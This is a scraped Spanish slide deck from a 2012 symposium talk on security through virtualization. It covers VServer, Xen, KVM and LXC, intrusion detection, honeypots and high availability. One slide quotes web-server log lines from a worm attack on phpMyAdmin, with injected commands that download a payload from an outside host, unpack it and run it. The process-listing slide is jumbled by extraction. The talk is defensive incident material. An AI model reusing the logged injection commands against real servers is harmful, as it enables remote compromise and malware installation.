dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 

Último (20)

GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 

Seguridad por virtualización G4

  • 1. 2012-10-30 Seguridad por virtualización G4 Simposium ITSSAT Derechos reservados © 2004-2012 Sandino Araico Sánchez <sandino@sandino.net> / Enrique A. Sánchez Montellano <enrique.sanchez@yaguarete-sec.com> / Rolando Cedillo Caballero <rolando@intelligencia.com> Se permite ilimitadamente el uso, copia, redistribución con o sin modificaciones siempre y cuando se mantenga el aviso de derecho de autor y se anoten al final de la presentación todas las modificaciones que se llevan a cabo conservando la historia de las modificaciones que hagan las demás personas e indicando la fecha de cada modificación y el nombre de la persona que la llevó a cabo.
  • 2. Seguridad por virtualización Xen http://xensource.com Vbox http://www.virtualbox.org KVM http://linux-kvm.org Zonas de Open Solaris Open VZ http://openvz.org LXC http://lxc.sourceforge.net Linux-vserver http://linux-vserver.org GR Security http://grsecurity.net
  • 3. Atributos de la seguridad por virtualización Eficiencia Encapsulamiento Auditabilidad Introspección Dureza
  • 4. Introspección Host [root@carnitas root] ps fax PID TTY STAT TIME COMMAND 1? S 0:04 init [3] 2? SW 0:00 [keventd] 3? SW 0:00 [kapmd] 4? SWN 0:00 [ksoftirqd_CPU0] 5? Z 1:06 [kswapd <defunct>] 6? SW 0:08 [bdflush] 7? SW 5:57 [kupdated] 8? SW 6:56 [kjournald] guest vserver guest vserver guest vserver 61 ? SW 0:00 [khubd] 109 ? SW< 0:00 [mdrecoveryd] 1186 ? SW 0:03 [kreiserfsd] 31375 ? S 4:59 syslogd -m 0 21127 ? S 5:16 klogd -x ipv4root is now 192.168.4.9 350 ? ipv4root is now S ipv4root is now 192.168.4.10 127.0.4.10 New security context is 49163 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scripts/apmscript [root@fedora-install /] ps fax New security context is 49153 192.168.4.6 PID TTY STAT TIME COMMAND 17503 ? S 0:00 /usr/sbin/sshd [root@fedora-pruebas /] ps fax 21576 pts/23 S 0:00 /bin/bash -login 1092 pts/23 R 0:00 _ ps fax 28746 ? S 0:00 /usr/bin/freshclam -d -p /var/run/clamav/freshclam.pid 2482 ? S 0:18 _ /usr/sbin/sshd PID TTY STAT TIME COMMAND New security context is 27546 ? S 0:08 /usr/sbin/clamd 8936 ? S 0:00 _ /usr/sbin/clamd 26369 pts/19 S 0:00 | _ -bash 11416 pts/23 S 0:00 /bin/bash - 12545 pts/18 S 0:00 su jabber -c /usr/sbin/jabberd -H /var/lib/jabber -c /var/run/jabber/jabber.xml 8519 pts/18 S 0:00 _ /usr/sbin/jabberd -H /var/lib/jabber -c /var/run/jabber/jabber.xml 49154 21987 pts/18 S 0:00 _ /usr/sbin/jabberd -H /var/lib/jabber -c /var/run/jabber/jabber.xml 15624 pts/19 S 0:00 | _ screen -r 11587 ? 27159 ? S S login 0:00 /usr/lib/courier-imap/sbin/courierlogger pop3d-ssl 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 6378 ? S 0:00 _ /usr/sbin/sshd 642 pts/23 R 0:00 _ ps fax 27614 ? S 0:00 /usr/lib/courier-imap/sbin/courierlogger pop3d [root@carnitas /] ps fax 23069 ? S 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 15630 ? S 0:00 /usr/lib/courier-imap/sbin/courierlogger imapd-ssl 22919 pts/22 S 0:00 | _ -bash 6387 ? 7574 ? S S 27525 ? S 2:10 /usr/sbin/rcd -r 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 0:00 /usr/lib/courier-imap/sbin/courierlogger imapd 18816 pts/22 S 0:00 | _ tail --follow=name /var/log/info 468 ? S 34:22 SCREEN PID TTY STAT TIME 29190 ? S 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/courierlogger -stderrl 75 ? S 0:00 /usr/lib/courier-imap/sbin/courierlogger -pid=/var/run/authdaemon.courier-imap/pid -start /usr/lib/courier-imap/libe 7065 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 2924 ? S 0:00 _ /usr/sbin/sshd 16345 ? S 0:00 11908 pts/2 S 0:00 _ /bin/bash _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain COMMAND 342 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 3507 pts/23 S 0:00 _ -bash 17447 pts/2 S 125:19 | _ top 9778 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 30034 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 18176 ? S 0:00 _ /usr/lib/courier-imap/libexec/authlib/authdaemond.plain 5315 pts/23 R 0:00 _ ps fax 24134 pts/3 S 0:00 _ /bin/bash 29351 pts/23 S 12295 ? S 0:00 /usr/libexec/postfix/master 5888 ? S 0:00 _ qmgr -l -t fifo -u 5193 ? SL 0:00 ntpd -U ntp -g 15032 pts/4 S 0:01 _ /bin/bash 22906 ? S 0:00 _ pickup -l -t fifo -u 7880 ? S 0:03 /usr/bin/spamd -d -x -u spamd -m 6 -H /var/cache/spamd 0:00 /bin/bash -login 13036 ? S 0:01 _ spamd child 11656 ? S 0:00 gpm -t ps/2 -m /dev/psaux 29368 ? 12580 ? S S 0:01 _ spamd child 0:01 _ spamd child 30409 pts/5 S 0:09 _ /bin/bash 18722 ? S 0:00 crond 27016 pts/6 S 0:03 _ /bin/bash 13315 ? S 0:01 _ spamd child 30000 pts/23 R+ 0:00 23456 ? S 0:01 _ spamd child 27050 ? S 0:00 _ spamd child 27300 ? S 0:00 /usr/sbin/atd 16011 ? 9849 ? S S 0:00 /usr/sbin/httpd 18787 pts/12 S 0:06 _ /bin/bash 0:00 _ /usr/sbin/rotatelogs /var/log/httpd/sapodesk.access.log.%Y%B%d 604800 8063 ? S 0:00 /usr/local/sbin/rebootmgr --pidfile /var/run/rebootmgr.pid fedora fedora-pruebas gentoo mandrake redhat 19997 ? S 0:00 crond _ ps fax 21818 ? S 0:00 _ /usr/sbin/httpd 17319 ? S 0:00 _ /usr/sbin/httpd 16118 ? S 0:00 _ /usr/sbin/httpd 10923 ? S 0:00 login -- ruth 15154 ? S 0:00 _ /usr/sbin/httpd 26925 ? S 0:04 /usr/libexec/ 31178 ? Ss 0:04 / 22121 ? S 0:00 _ /usr/sbin/httpd 16086 tty2 S 0:01 _ -bash postfix/master 19986 ? S 0:00 _ /usr/sbin/httpd 22846 ? S 0:00 _ /usr/sbin/httpd 11579 ? S 0:00 _ /usr/sbin/httpd 14621 tty3 S 0:00 /sbin/mingetty tty3 15234 ? S 0:00 xinetd -stayalive usr/sbin/cron 3342 pts/18 S 0:00 /bin/sh /usr/bin/safe_mysqld --defaults-file=/etc/my.cnf 23346 pts/18 S 0:00 _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid- 15563 tty4 S 0:00 /sbin/mingetty tty4 -pidfile /var/run/xinetd.pid file= 28855 pts/18 S 0:00 _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid- 8298 ? Ss 0:00 / f 21516 tty5 S 0:00 /sbin/mingetty tty5 30840 pts/18 S 19176 pts/18 S 0:00 0:00 3983 ? S 0:09 /usr/sbin/sshd _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --p _ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --p 13617 tty6 S 0:00 /sbin/mingetty tty6 12499 ? S 0:35 _ sshd: 24053 ? S 15:00 /usr/sbin/rcd -r usr/sbin/sshd 30151 ? S 0:00 crond 26749 ? S 0:03 /usr/sbin/sshd 2390 ? S 76:58 SCREEN 8813 ? 29821 pts/1 S S 0:11 _ sshd: root@pts/1 0:00 | _ -bash root@pts/0 1833 pts/7 S 0:00 _ /bin/bash 14284 pts/0 S 0:00 _ -bash 12965 ? Ss 0:00 / 4149 pts/1 S 0:00 | _ screen 2753 ? S 1:02 | _ SCREEN 8203 pts/11 S 0:00 | _ /bin/bash 3889 pts/8 S 0:01 _ /bin/bash 21729 pts/11 S 58:56 | | _ top 10672 pts/0 S 0:00 _ screen usr/sbin/syslogd -m 0 3848 pts/14 S 0:04 | _ /bin/bash 32320 pts/9 S 0:00 _ /bin/bash -r 9026 pts/15 S 0:00 | _ /bin/bash 17204 pts/20 S 0:00 | _ /bin/bash 602 pts/21 S 0:00 | _ /bin/bash 5109 pts/10 S 0:06 _ /bin/bash 21878 ? S 3:32 syslogd -m 0 [root@carnitas /] 12312 pts/18 S 0:01 | _ /bin/bash 3484 ? S 0:00 _ sshd: root@pts/16 90 pts/13 S 0:00 _ /bin/bash [root@fedora-pruebas /] 12719 pts/16 S 0:00 _ -bash 24044 pts/16 S 0:00 _ tail --follow=name /var/log/boot.log /var/log/cron /var/log/dmesg /var/log/httpd/access_log /var/log/htt 6578 pts/16 S 0:00 _ tail --follow=name /var/log/boot.log /var/log/cron /var/log/dmesg /var/log/httpd/access_log /var/log/htt 6877 pts/17 S 0:00 _ /bin/bash 1220 ? S [root@fedora-install /] 0:05 syslogd -m 0 24449 ? S 0:00 login -- viewlog 3085 tty1 S 0:00 _ /bin/sh /var/log/viewlogs.sh 4594 tty1 S 0:00 _ tail --follow=name boot.log cron dmesg ksyms.0 maillog messages mysqld.log secure apache/*log
  • 5. VM VM VM (guest) (guest) (guest) Capa de virtualización Hardware (host)
  • 6. Herramientas de detección de intrusos Snort AIDE / samhain Chkrootkit / RKHunter Tcpdump / Wireshark NTOP PSAD / blockhosts clamav
  • 7. Sin virtualización Host 207.113.245.241 Snort Servicios en Log producción clientes hostiles
  • 8. Con virtualización 207.113.245.241 Log Servicios Snort en producción Capa de virtualización tcpdump en el host clientes hostiles
  • 9. Honeypot en producción 207.113.245.241 Log Snort Servicios probablemente vulnerables Capa de virtualización tcpdump en el host clientes hostiles
  • 10. Firma de binarios Sin virtualización Host 207.113.245.241 /bin /lib /etc /usr/bin /usr/lib Log /usr/sbin /usr/sbin/aide clientes hostiles
  • 11. Firma de binarios /bin /lib /etc /bin /lib /etc /bin /lib /etc /usr/bin /usr/bin /usr/bin Repo /usr/sbin /bin /lib /etc /usr/sbin /bin /lib /etc /usr/sbin /bin /lib /etc /usr/bin /usr/bin /usr/bin /usr/sbin /usr/sbin /usr/sbin Aide / samhain Capa de virtualización Hardware (host) clientes hostiles
  • 12. Acceso a la red Iptables Iproute2 OpenVPN Squid Ipcop blockhosts
  • 13. Sin virtualización Host 200.33.4.13 - 18 /var/www/html /home POP3 HTTP SMTP FTP IMAP FTP clientes
  • 14. Con virtualización FTP HTTP SMTP POP3 Capa de virtualización /var/www/html /home Hardware (host) clientes
  • 15. DMZ virtual FTP HTTP SMTP POP3 Capa de virtualización /var/www/html /home NAT Hardware (host) clientes
  • 16. Así se ve un gusano arrachera.saks: 614 total, 2 running, 612 sleeping, 0 stopped, 0 zombie Cpu0 : 0.0%us, 0.1%sy, 0.0%ni, 97.2%id, 0.0%wa, 1.5%hi, 1.2%si, 0.0%st ... Mem: 12302896k total, 12038224k used, 264672k free, 1234036k buffers Swap: 4192880k total, 3280k used, 4189600k free, 7756440k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 16044 bin 24 0 3540 1956 1340 R 100 0.0 11:02.05 x 12188 40 17 0 23176 19m 1860 S 0 0.2 0:31.61 named 27265 40 15 0 15536 12m 2068 S 0 0.1 0:01.27 named 7721 root 15 0 17604 1968 992 R 0 0.0 1:04.83 top
  • 17. Así se ve un gusano 599 [root@posh ~] vcontext --xid 126 --migrate -- ls -la /proc/16044 total 0 dr-x------ 6 bin bin 0 Oct 9 12:03 . dr-xr-xr-x 629 root root 0 Oct 8 08:24 .. dr-xr-xr-x 2 bin bin 0 Oct 9 12:17 attr ... -r--r--r-- 1 bin bin 0 Oct 9 12:14 cmdline lrwxrwxrwx 1 bin bin 0 Oct 9 12:17 cwd -> /vservers/eaea/usr/local/apache2/ eaea/data/bb -r-------- 1 bin bin 0 Oct 9 12:17 environ lrwxrwxrwx 1 bin bin 0 Oct 9 12:03 exe -> /vservers/eaea/usr/bin/perl ... -rw-r--r-- 1 bin bin 0 Oct 9 12:17 oom_adj -r--r--r-- 1 bin bin 0 Oct 9 12:17 oom_score lrwxrwxrwx 1 bin bin 0 Oct 9 12:17 root -> /vservers/eaea ...
  • 18. Así se ve un gusano 84.194.192.10 - - [09/Oct/2009:06:19:28 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea;%20wget%20ns.ava- bg.com/~eliza/emsi.gif;%20tar%20zxvf%20emsi.gif;%20rm%2 0-rf%20emsi.gif;%20cd%20mc-root;%20./start%20php.My-Admin- HTTP/1.1" 200 318 84.194.192.10 - - [09/Oct/2009:06:19:50 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea/mc-root/r;%20ps%20x HTTP/1.1" 200 827 84.194.192.10 - - [09/Oct/2009:06:20:32 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea/mc-root/r;%20wget %20ns.ava-bg.com/~eliza/dd0s.gif;%20tar%20zxvf%20dd0s.gif;%20rm %20-rf%20dd0s.gif;%20cd%20bb;%20PATH=%22./%22%20httpd;%20ps%20x HTTP/1.1" 200 1123 84.194.192.10 - - [09/Oct/2009:06:20:54 -0500] "GET //phpmyadmin/config/ inc.inc.php?c=cd%20/usr/local/apache2/htdocs/eaea/mc-root/r/bb; %20./httpd;%20ps%20x HTTP/1.1" 200 839
  • 19. Sistemas embebidos uClibc Gentoo embedded <--- Linux Not GNU USE=static Resource limits Storage limits Solamente un proceso estático y ya
  • 20. Con virtualización (Embebidos) HTTP FTP SMTP POP3 Capa de virtualización /var/www/html /home Hardware (host) clientes
  • 21. Funciona igual pero son más pequeños Un proceso por vserver Sistema de archivos mínimo No hay librerías No hay compiladores Fácilmente clusterizables
  • 22. Virtualización + HA /var/www/html - NAS - /home Host A Host B Capa de virtualización VPS VPS VPS VPS VPS VPS VPS Director en standby Director Clientes
  • 23. NAS redundante NAS A NAS B Host A Host B Capa de virtualización VPS VPS VPS VPS VPS VPS VPS Director en standby Director Clientes
  • 24. Estable (viejo) Linux 2.6.22.19 Linux-Vserver 2.2.0.7 GR Security 2.1.11 LVM2 Gentoo hardened 10.0 NFS
  • 25. Desarrollo Linux 3.2.22 Linux-Vserver 2.3.2.10 GR Security 2.9.1 LVM2 Gentoo hardened 12.0 DRBD OCFS2 / GFS2 / Glusterfs / Ceph
  • 26. Cuadro comparativo Linux-vserver Libre Libre y Xen propietario KVM Libre LXC Libre
  • 27. Sistema operativo Linux-vserver Linux Xen Linux / Net BSD / Open Solaris KVM Linux LXC Linux
  • 28. Tecnología de virtualización Linux-vserver Soft partitioning Virtualización y Xen paravirtualización Virtualización y KVM paravirtualización LXC Soft partitioning
  • 29. Encapsulamiento Linux-vserver Parcial Xen Sí KVM Sí LXC Parcial
  • 30. Auditabilidad Linux-vserver Sí Xen No KVM No LXC Sí Xen y KVM podrían ser auditables si montamos el sistema de archivos raíz sobre NFS o sobre OCFS2/GFS2/Ceph
  • 31. Introspección Linux-vserver Sí Xen No KVM No LXC Sí El acceso a la consola del S. O. no se considera introspección
  • 32. GR Security Linux-vserver Sí Xen En Linux > 3.0 KVM Sí LXC Sí
  • 33. Sistemas operativos heterogeneos Linux-vserver No Linux, Net BSD, Xen Open Solaris KVM Solo en AMD64 LXC No
  • 34. Versión más reciente de Linux (sin GR Security) Linux-vserver 3.6 Xen 3.6.4 KVM 3.6.4 LXC 3.6.4
  • 35. Versión más reciente de Linux (con GR Security) Linux-vserver 3.2.22 Xen 3.6.4 KVM 3.6.4 LXC 3.6.4
  • 36. Firma de binarios Sin virtualización Host 207.113.245.241 /bin /lib /etc /usr/bin /usr/lib Log /usr/sbin /usr/sbin/aide clientes hostiles
  • 37. IDS en el NAS NAS /bin /lib /etc /usr/bin /usr/lib /usr/sbin Log ( aide | chkrootkit | rkhunter | samhain ) ( snort | NTOP ) Host A Host B ( tcpdump | blockhosts ) Capa de virtualización VPS VPS VPS VPS clientes hostiles
  • 38. Referencias http://linux-vserver.org http://sourceware.org/cluster/gfs/ http://grsecurity.net http://oss.oracle.com/projects/ocfs2/ http://www.openvz.org http://gluster.org http://www.uclibc.org http://www.drbd.org/ http://lxc.sourceforge.net/ http://www.linux-kvm.org http://mirrors.sandino.net/vserver/images http://linux-vserver.org/Linux-VServer-Paper http://www.redhat.com/magazine/014dec05/features/xen/ Sandino Araico Sánchez <sandino@1101.mx> @KBrown